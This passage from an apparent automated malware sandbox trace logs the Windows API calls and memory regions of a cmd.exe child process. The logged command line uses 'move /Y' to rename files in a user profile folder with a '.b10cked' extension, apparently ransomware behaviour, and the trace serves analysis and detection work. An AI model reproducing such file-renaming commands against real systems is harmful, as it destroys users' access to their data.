"c:\\users\\alluse~1\\micros~2\\ms.infopath.14.1033.hxn.b10cked")) returned 0xffffffff [0203.169] GetLastError () returned 0x2 [0203.169] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e59c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e59c) returned 0x1a0e78 [0203.170] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x14e59c | out: lpFindFileData=0x14e59c) returned 0 [0203.170] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.170] GetLastError () returned 0x12 [0203.170] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x14e59c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e59c) returned 0x1a0e78 [0203.170] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x14e59c | out: lpFindFileData=0x14e59c) returned 0 [0203.170] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.170] GetLastError () returned 0x12 [0203.200] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1b1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be8) returned 0x1a0e78 [0203.200] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x1b1be8 | out: lpFindFileData=0x1b1be8) returned 0 [0203.200] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.200] GetLastError () returned 0x12 [0203.200] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1b1be8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be8) returned 0x1a0e78 [0203.200] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x1b1be8 | out: lpFindFileData=0x1b1be8) returned 0 [0203.201] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0203.203] GetLastError () returned 0x12 [0203.203] _get_osfhandle (_FileHandle=2) returned 0xb [0203.203] GetFileType (hFile=0xb) returned 0x2 [0203.203] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0203.203] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14e76c | out: lpMode=0x14e76c) returned 1 [0203.203] _get_osfhandle (_FileHandle=2) returned 0xb [0203.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14e7a0 | out: lpConsoleScreenBufferInfo=0x14e7a0) returned 1 [0203.203] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.204] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e7e0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0203.205] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x14e7c4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e7c4*=0x2c) returned 1 [0203.205] longjmp () [0203.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.205] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.205] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.205] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.205] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.205] SetConsoleInputExeNameW () returned 0x1 [0203.205] GetConsoleOutputCP () returned 0x1b5 [0203.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.206] exit (_Code=1) Process: id = "463" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29216 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29217 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29218 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29219 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 29220 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29221 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29222 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29223 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29224 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 29225 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30039 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30040 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30041 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30042 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 30043 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 30044 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30045 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30046 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30047 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30048 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30049 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30050 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30051 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30052 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30053 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 30054 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30055 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30056 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30057 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30058 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30059 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30060 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 30061 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 30062 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 30118 start_va = 0x12d0000 end_va = 0x138ffff entry_point = 0x12d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 659 os_tid = 0xcd0 [0203.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe24 | out: lpSystemTimeAsFileTime=0x22fe24*(dwLowDateTime=0xaddb4c60, dwHighDateTime=0x1d440a9)) [0203.076] GetCurrentProcessId () returned 0xc5c [0203.076] GetCurrentThreadId () returned 0xcd0 [0203.076] GetTickCount () returned 0x394a0 [0203.076] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe1c | out: lpPerformanceCount=0x22fe1c*=25986555308) returned 1 [0203.077] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0203.077] __set_app_type (_Type=0x1) [0203.077] __p__fmode () returned 0x76b331f4 [0203.077] __p__commode () returned 0x76b331fc [0203.077] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0203.077] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0203.077] GetCurrentThreadId () returned 0xcd0 [0203.077] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd0) returned 0x38 [0203.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0203.077] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0203.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fdb4 | out: phkResult=0x22fdb4*=0x0) returned 0x2 [0203.078] VirtualQuery (in: lpAddress=0x22fdeb, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.078] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fd84, dwLength=0x1c | out: lpBuffer=0x22fd84*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0203.078] GetConsoleOutputCP () returned 0x1b5 [0203.078] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.078] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0203.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.078] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0203.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.078] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0203.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0203.079] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0203.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.079] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0203.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.079] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0203.079] GetEnvironmentStringsW () returned 0x320198* [0203.079] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0203.079] GetEnvironmentStringsW () returned 0x320198* [0203.079] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0203.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed24 | out: phkResult=0x22ed24*=0x40) returned 0x0 [0203.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0xc0, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.079] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x0, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegCloseKey (hKey=0x40) returned 0x0 [0203.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed24 | out: phkResult=0x22ed24*=0x40) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x40, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x1, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x0, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x9, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x4, lpData=0x22ed30*=0x9, lpcbData=0x22ed28*=0x4) returned 0x0 [0203.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed2c, lpData=0x22ed30, lpcbData=0x22ed28*=0x1000 | out: lpType=0x22ed2c*=0x0, lpData=0x22ed30*=0x9, lpcbData=0x22ed28*=0x1000) returned 0x2 [0203.080] RegCloseKey (hKey=0x40) returned 0x0 [0203.080] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a5 [0203.080] srand (_Seed=0x5b8863a5) [0203.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"" [0203.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"" [0203.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.081] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.081] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.081] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0203.081] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0203.081] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0203.081] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0203.081] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0203.081] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0203.081] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0203.081] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0203.081] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0203.081] GetEnvironmentStringsW () returned 0x3222e8* [0203.081] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0203.081] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.081] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.081] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.081] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.081] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.081] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.081] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.081] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.081] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.081] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.081] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22faf0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.082] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22faf0, lpFilePart=0x22faec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22faec*="Desktop") returned 0x18 [0203.082] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.082] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f86c | out: lpFindFileData=0x22f86c) returned 0x320028 [0203.082] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0203.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f86c | out: lpFindFileData=0x22f86c) returned 0x320028 [0203.082] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0203.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f86c | out: lpFindFileData=0x22f86c) returned 0x320028 [0203.082] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0203.082] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0203.082] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0203.082] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0203.082] GetEnvironmentStringsW () returned 0x322b08* [0203.083] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0203.083] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0203.083] GetConsoleOutputCP () returned 0x1b5 [0203.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0203.083] GetUserDefaultLCID () returned 0x409 [0203.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0203.083] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fc30, cchData=128 | out: lpLCData="0") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fc30, cchData=128 | out: lpLCData="0") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fc30, cchData=128 | out: lpLCData="1") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0203.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0203.084] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.085] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: 